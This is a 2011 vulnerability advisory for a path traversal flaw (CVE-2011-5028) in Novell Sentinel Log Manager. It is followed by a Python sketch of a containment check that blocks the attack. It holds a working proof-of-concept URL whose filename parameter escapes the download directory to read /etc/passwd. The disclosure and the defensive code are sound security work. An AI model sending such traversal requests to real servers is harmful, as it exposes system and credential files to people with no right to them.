Novell Sentinel Log Manager vulnerability

Path Traversal.

Posted by Andrea Fabrizi on December 18, 2011

Novell Sentinel Log Manager versions 1.2.0.1 and lower are prone to a directory traversal vulnerability that allows authenticated users to access any system file.

POC

/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd

BID: http://www.securityfocus.com/bid/51104/info

CVE-2011-5028: http://www.cvedetails.com/cve/CVE-2011-5028
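
The filename in the PoC above begins with a legitimate-looking directory and only then climbs out with `../`, so a download handler has to test containment on the normalized path, not on the raw string. The following Python sketch of that check is an added example, not Novell's code and not part of the original advisory; `BASE_DIR`, `naive_is_allowed` and `resolve_download` are hypothetical names, and the allowed directory is an assumption taken from the PoC prefix.

```python
import posixpath

# Assumption: downloads are meant to stay under this directory (taken from the
# prefix of the PoC path; the product's real configuration is not on the page).
BASE_DIR = "/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp"

# The filename value from the PoC request above.
POC_FILENAME = BASE_DIR + "/../../../../../../etc/passwd"


def naive_is_allowed(filename: str) -> bool:
    """Hypothetical weak check, for contrast: raw string prefix only."""
    return filename.startswith(BASE_DIR + "/")


def resolve_download(filename: str, base_dir: str = BASE_DIR) -> str:
    """Return the normalized path if it stays inside base_dir, else raise."""
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    base = posixpath.normpath(base_dir)
    # Relative names are resolved against base; absolute names are kept as
    # given. normpath then collapses "." and ".." lexically.
    candidate = posixpath.normpath(posixpath.join(base, filename))
    # commonpath compares whole components, so ".../temp_old/x" is not treated
    # as being inside ".../temp". The directory itself is not a valid file.
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        raise PermissionError("outside download directory: " + candidate)
    # On a real server, also resolve symlinks (os.path.realpath) before the
    # containment test; normpath alone does not follow them.
    return candidate


if __name__ == "__main__":
    for name in ("audit.log", POC_FILENAME, BASE_DIR + "_old/x"):
        try:
            print("serve ", resolve_download(name))
        except PermissionError as exc:
            print("reject", exc)
```

The prefix-only check accepts the PoC value, while the normalized check rejects it and still serves plain file names inside the directory.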